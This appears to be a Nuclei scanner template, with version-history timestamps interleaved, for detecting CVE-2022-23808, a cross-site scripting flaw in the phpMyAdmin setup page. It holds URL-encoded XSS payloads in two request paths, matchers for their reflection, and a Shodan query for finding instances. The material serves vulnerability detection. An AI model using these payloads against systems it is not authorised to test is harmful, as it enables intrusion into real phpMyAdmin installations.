2022-02-14 11:43:04 +00:00
id : CVE-2022-23808
info :
2022-02-28 21:30:49 +00:00
name : phpMyAdmin < 5.1.2 - Cross-Site Scripting
2022-05-16 18:03:46 +00:00
author : cckuailong,daffainfo
2022-02-14 11:43:04 +00:00
severity : medium
2022-03-08 17:36:49 +00:00
description : An issue was discovered in phpMyAdmin 5.1 before 5.1.2 that could allow an attacker to inject malicious code into aspects of the setup script, which can allow cross-site or HTML injection.
2022-02-14 11:43:04 +00:00
reference :
- https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A
- https://github.com/dipakpanchal456/CVE-2022-23808
- https://nvd.nist.gov/vuln/detail/CVE-2022-23808
2022-05-17 09:18:12 +00:00
- https://www.phpmyadmin.net/security/PMASA-2022-2/
2022-02-14 11:43:04 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-23808
cwe-id : CWE-79
2022-05-17 07:06:09 +00:00
metadata :
verified : true
shodan-query : http.component:"phpmyadmin"
2022-03-03 11:39:21 +00:00
tags : cve,cve2022,phpmyadmin,xss
2022-02-14 11:43:04 +00:00
requests :
- method : GET
path :
2022-05-17 07:25:00 +00:00
- "{{BaseURL}}/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
- "{{BaseURL}}/setup/index.php?page=servers&mode=test&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-02-14 11:43:04 +00:00
2022-03-03 11:39:21 +00:00
stop-at-first-match : true
2022-02-14 11:43:04 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-05-17 07:25:00 +00:00
- "\"></script><script>alert(document.domain)</script>"
2022-05-16 18:03:46 +00:00
- "<h2>Add a new server</h2>"
- "<title>phpMyAdmin setup"
condition : and
2022-02-28 21:30:49 +00:00
2022-05-17 07:06:09 +00:00
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200
2022-03-08 17:36:49 +00:00
# Enhanced by mp on 2022/03/08